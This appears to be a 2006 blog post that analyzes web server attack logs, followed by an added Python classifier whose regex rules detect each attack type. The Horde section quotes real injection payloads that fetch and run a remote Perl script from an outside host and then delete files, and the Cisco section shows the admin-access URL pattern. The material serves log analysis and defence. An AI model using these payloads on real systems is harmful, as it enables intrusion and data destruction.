Web logs of web attacks, part 2
Posted : 2006/10/17 20:19
Posted by : 좋은진호 ( http://coffeenix.net/ )
Title : Web logs of web attacks, part 2
Author : 좋은진호 (truefeel, http://coffeenix.net/)
Written : 2006.5.25 (Thu)~
Compiled : 2006.9.18 (Mon)
This is the second set of web log analysis(?) results, following 'Web logs of web attacks'. A great many
kinds of web attack logs have accumulated in the meantime, but many of them are hard to analyze clearly
(no related material can be found). Analyzing and writing up every log at this point is of course impossible,
and trying to provide more analysis results would delay this article far too long, so I have written up at
least a part. When I work out which attack attempt a previously recorded log represents, I will add it to
this article.
To judge whether a web attack may actually have resulted in a compromise, please read the article I wrote earlier.
http://coffeenix.net/board_view.php?bd_code=1352
※ For this article in particular, the tables display best in MSIE.
1. Logs left by the system monitoring tool What's Up
210.xxx.xx.xxx - - [19/Apr/2006:17:20:25 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"
210.xxx.xx.xxx - - [19/Apr/2006:17:35:33 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"
- These are logs of What's Up, a Windows-based commercial monitoring tool, connecting to check whether the web server is alive.
References :
* WhatsUp homepage
http://www.ipswitch.com/products/whatsup/index.asp
2. Attack exploiting a vulnerability in the open-source webmail Horde
201.219.7.xx - - [24/Apr/2006:00:08:53 +0900] "GET //README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:54 +0900] "GET /horde//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:54 +0900] "GET /horde2//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:55 +0900] "GET /horde3//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:55 +0900] "GET /horde-3.0.9//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:56 +0900] "GET /Horde//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:56 +0900] "GET /mail//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:57 +0900] "GET /webmail//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:58 +0900] "GET /horde-3.0.1//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:58 +0900] "GET /horde-3.0.2//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:59 +0900] "GET /horde-3.0.3//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:59 +0900] "GET /horde-3.0.4//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:00 +0900] "GET /horde-3.0.5//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:00 +0900] "GET /horde-3.0.6//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:01 +0900] "GET /horde-3.0.7//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:01 +0900] "GET /horde-3.0.8//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:31 +0900] "GET /horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:31 +0900] "GET /pub/horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:35 +0900] "GET /horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:36 +0900] "GET /pub/horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:37 +0900] "GET /horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:38 +0900] "GET /services/help/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:38 +0900] "GET /horde-cvs/horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:39 +0900] "GET /pub/horde-cvs/horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
- IP : Ecuador (RC, 201.219.7.0/24)
  United States (216.65.0.0 - 216.65.127.255)
  Costa Rica (CR, 196.40.85.128/25)
References :
3. Attack exploiting the Windows Media Services ISAPI nsiislog.dll POST overflow vulnerability
202.100.xxx.xxx - - [24/Apr/2006:11:53:13 +0900] "GET /scripts/nsiislog.dll" 404 - "-"
202.100.xxx.xxx - - [24/Apr/2006:11:53:54 +0900] "GET /scripts/nsiislog.dll" 404 - "-"
- IP : China (CN, 202.100.96.0 - 202.100.127.255)
- This vulnerability was published in June 2003 and applies to Windows 2000 Server.
  If the server returns the string 'NetShow ISAPI Log Dll' when 'GET /scripts/nsiislog.dll /HTTP/1.0'
  is requested on port 80, the system is vulnerable.
References :
* Microsoft Media Services ISAPI nsiislog.dll POST Overflow
http://www.osvdb.org/4535
* Windows Media Services Remote Command Execution #2
http://archives.neohapsis.com/archives/bugtraq/2003-06/0211.html
* Successful attack using MS03-022 vuln
http://lists.sans.org/pipermail/unisog/2003-September/022422.html
4. Proxy scanning logs from the proxy_scanner tool
211.100.xx.xx - - [06/Jun/2006:21:17:38 +0900] "GET http://check.211.xxx.xxx.xx.v.80.pdx8.super.proxy.scanner.ii.9966.org/Provy_OK.html HTTP/1.1" 404 - "-"
61.135.xxx.xxx - - [06/Jun/2006:23:43:32 +0900] "GET http://check.211.xxx.xxx.xx.v.80.PCN22.super.proxy.scanner.ii.9966.org/Provy_OK.html HTTP/1.1" 404 - "-"
211.100.xx.xx - - [02/Jul/2006:09:37:52 +0900] "GET http://check.211.xxx.xxx.xx.v.80.pdx8.super.proxy.scanner.ii.9966.org/Provy_OK.html HTTP/1.1" 404 - "-"
- IP : China (CN, 211.100.32.0 - 211.100.95.255)
  China (CN, 61.135.0.0 - 61.135.255.255)
- These requests come from 'proxy_scanner', a proxy scanning tool released by a Chinese hacker in 2004,
  and check whether the host can be used as a proxy.
- The requested URL has the following format.
http://check.$ip_address.v.80.(pdx8|PCN22|mt1|pw1).super.proxy.scanner.(i.thu.cn|ii.9966.org)/Provy_OK.html
  All check...super.proxy.scanner.(i.thu.cn|ii.9966.org) hosts resolve to the IP 61.135.170.153, so apart
  from a few IPs (DNS servers, etc.) the zone appears to be configured in DNS as '* IN A 61.135.170.153'.
- These web servers run lighttpd/1.4.11. (This is easy to confirm by telnetting to port 80.)
References :
* What's a super.proxy.scanner and why is it in my logs?
http://isc.sans.org/diary.php?storyid=1298
* Proxy Probes
http://www.splunk.com/splunkbin/426
5. Attack exploiting a vulnerability that grants admin privileges through Cisco IOS HTTP
81.225.xx.xx - - [29/Aug/2006:13:23:45 +0900] "GET /level/16/exec/show%20conf HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; PMF Master V3.0)"
- IP : Sweden (SE, 81.224.0.0 - 81.236.255.255)
- See the item '14. Attack exploiting a very old HTTP vulnerability (2001) in Cisco Switch'
  in the previous web log analysis article.
- This vulnerability allows full admin privileges to be obtained through the URL
  http://Switch_IP/level/$NUMBER/exec/...., where $NUMBER in /level/$NUMBER/exec/... is a number between 16 and 99.
- An automated tool called Cisco Global Exploiter exists for scanning for Cisco vulnerabilities.
References :
* Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
http://www.securityfocus.com/bid/2936
* Multiple Cisco Exploit Codes
http://www.securiteam.com/exploits/5OP0L1FCAE.html
http://downloads.securityfocus.com/vulnerabilities/exploits/ciscoMultipleVulnsExploit.pl
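The five log signatures described above can be matched automatically when reviewing an access log. The Python code below is an added example, not part of the original article: it generalizes the sections into one classifier, and the rule labels, the classify/summarize helpers, the "review anything not answered with 4xx/5xx" heuristic and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Article's log layout: ip - - [time] "request" status bytes "user-agent"
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>.*)" '
                     r'(?P<status>\d{3}) \S+ "(?P<ua>[^"]*)"$')

# One rule per section of the article: (label, field to test, pattern).
RULES = [
    ("whatsup-monitor", "ua", re.compile(r"^WhatsUp ")),
    ("horde-help-injection", "target",
     re.compile(r"/services/help/.*module=.*passthru\(", re.I)),
    ("horde-probe", "target", re.compile(r"//README$|/services/help/$")),
    ("nsiislog-probe", "target", re.compile(r"/scripts/nsiislog\.dll", re.I)),
    ("proxy-scanner", "target", re.compile(
        r"^http://check\.(\d+\.\d+\.\d+\.\d+)\.v\.80\.(?:pdx8|PCN22|mt1|pw1)"
        r"\.super\.proxy\.scanner\.(?:i\.thu\.cn|ii\.9966\.org)/")),
    ("cisco-level-exec", "target", re.compile(r"^/level/(1[6-9]|[2-9]\d)/exec/")),
]

def classify(line):
    """Return (label, client_ip, status, detail), or None if no rule matches."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    parts = m["req"].split(" ")
    # The request may lack an HTTP version (as in the nsiislog.dll entries).
    end = -1 if len(parts) > 2 and parts[-1].startswith("HTTP/") else None
    fields = {"ua": m["ua"], "target": unquote(" ".join(parts[1:end]))}
    for label, field, pattern in RULES:
        hit = pattern.search(fields[field])
        if hit:
            return label, m["ip"], int(m["status"]), (hit.groups() or ("",))[0]

def summarize(lines):
    """Count hits per label; list attack hits the server did not answer 4xx/5xx."""
    found = [c for c in map(classify, lines) if c]
    review = [c for c in found if c[0] != "whatsup-monitor" and c[2] < 400]
    return Counter(c[0] for c in found), review

# Constructed sample lines (documentation addresses), not taken from the article.
P = '192.0.2.7 - - [01/Jan/2006:00:00:00 +0900] '
SAMPLE = [
    P + '"HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"',
    P + '"GET /horde3//README HTTP/1.1" 404 - "Mozilla/4.0"',
    P + '"GET /scripts/nsiislog.dll" 404 - "-"',
    P + '"GET http://check.203.0.113.5.v.80.mt1.super.proxy.scanner.i.thu.cn/Provy_OK.html HTTP/1.1" 404 - "-"',
    P + '"GET /level/16/exec/show%20conf HTTP/1.1" 200 - "-"',
]
```

For proxy-scanner hits the detail field is the address embedded in the probed hostname, and for cisco-level-exec it is the requested level number; summarize(SAMPLE) returns the per-label counts plus the entries that were not rejected and so deserve a closer look.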